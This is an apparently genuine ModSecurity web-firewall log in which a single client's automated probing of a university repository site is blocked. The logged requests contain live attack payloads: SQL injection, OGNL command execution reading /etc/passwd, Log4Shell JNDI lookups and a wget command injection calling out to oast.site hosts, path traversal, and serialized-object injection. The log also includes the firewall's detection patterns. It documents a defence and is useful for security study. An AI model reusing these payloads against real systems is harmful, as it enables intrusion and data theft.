[Tue Aug 29 11:32:18.390280 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQOv8oAAAAw"]
[Tue Aug 29 11:32:21.419440 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAN9sVQAAAAJ"]
[Tue Aug 29 11:32:21.440085 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAANwNywAAAAb"]
[Tue Aug 29 11:32:22.361105 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQ83TgAAAAI"]
[Tue Aug 29 11:32:23.334732 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAARA7Y8AAAAA"]
[Tue Aug 29 11:32:23.350763 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAQnF-YAAAAF"]
[Tue Aug 29 11:32:25.390902 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAPDoFgAAAAP"]
[Tue Aug 29 11:32:26.308275 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102sCo-f0AAAQnF-4AAAAF"]
[Tue Aug 29 11:32:27.983522 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAQnGAUAAAAF"]
[Tue Aug 29 11:32:28.527310 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAQnGAwAAAAF"]
[Tue Aug 29 11:32:30.308675 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARNk4oAAAAS"]
[Tue Aug 29 11:32:31.307896 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARNk4sAAAAS"]
[Tue Aug 29 11:32:32.369433 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARH7HgAAAAM"]
[Tue Aug 29 11:32:32.369477 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARH7HgAAAAM"]
[Tue Aug 29 11:32:32.369558 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAANwN1IAAAAb"]
[Tue Aug 29 11:32:35.363451 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgi65twuwcx9ajz.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgi65twuwcx9ajz.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlg5nymt6kwecitx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAAQ83VQAAAAI"]
[Tue Aug 29 11:32:36.367197 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARIwJAAAAAO"]
[Tue Aug 29 11:32:37.468165 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARIwJQAAAAO"]
[Tue Aug 29 11:32:38.388530 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAAQ9H5QAAAAK"]
[Tue Aug 29 11:32:38.445729 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARMMdAAAAAR"]
[Tue Aug 29 11:32:40.427068 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlggbiumxmantzsx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARD1PoAAAAH"]
[Tue Aug 29 11:32:42.484074 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAAPDoIYAAAAP"]
[Tue Aug 29 11:32:46.427795 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARLXvgAAAAQ"]
[Tue Aug 29 11:32:47.552476 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARIwLUAAAAO"]
[Tue Aug 29 11:32:47.599671 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARA7boAAAAA"]
[Tue Aug 29 11:32:49.411537 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARTEJsAAAAG"]
[Tue Aug 29 11:32:49.663091 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAAPDoJAAAAAP"]
[Tue Aug 29 11:32:51.462575 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARA7cEAAAAA"]
[Tue Aug 29 11:32:59.323606 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARA7cUAAAAA"]
[Tue Aug 29 11:32:59.378977 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24gAAAAF"]
[Tue Aug 29 11:33:00.293118 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlg8uigyb33kmbbz.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10-MCo-f0AAARQ34kAAAAB"]
